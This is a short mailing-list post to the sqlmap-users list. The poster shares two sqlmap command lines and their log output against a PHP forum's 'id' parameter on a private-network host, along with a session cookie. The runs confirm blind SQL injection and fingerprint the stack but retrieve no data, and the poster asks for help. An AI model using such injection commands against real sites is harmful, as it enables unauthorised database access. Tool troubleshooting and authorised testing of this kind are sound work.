[sqlmap-users] Blind injection possible - no output

SourceForge Headquarters 1320 Columbia Street Suite 310 San Diego, CA 92101 +1 (858) 422-6466

sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
__utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=107765125.29.10.1252406202; __utmc=107765125;
PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
--url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
--string="Secret Forum" --fingerprint

[14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable
with 0 parenthesis
[14:09:04] [INFO] testing for parenthesis on injectable parameter
[14:09:06] [INFO] the injectable parameter requires 0 parenthesis
[14:09:06] [INFO] testing MySQL
[14:09:07] [INFO] confirming MySQL
[14:09:08] [INFO] retrieved:
[14:09:10] [INFO] the back-end DBMS is MySQL
[14:09:10] [INFO] retrieved:
[14:11:28] [INFO] retrieved:
[14:11:32] [INFO] retrieved:
[14:11:35] [INFO] retrieved:
[14:11:41] [INFO] retrieved:
[14:11:46] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
               comment injection fingerprint: MySQL 5.0.75

[*] shutting down at: 14:12:50

sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
__utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=107765125.29.10.1252406202; __utmc=107765125;
PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
--url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
--string="Secret Forum" --current-db

[14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare
nthesis
[14:14:01] [INFO] testing for parenthesis on injectable parameter
[14:14:03] [INFO] the injectable parameter requires 0 parenthesis
[14:14:03] [INFO] testing MySQL
[14:14:04] [INFO] confirming MySQL
[14:14:05] [INFO] retrieved:
[14:14:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL < 5.0.0

[14:14:07] [INFO] fetching current database
[14:14:07] [INFO] retrieved:
current database:       None

What to do?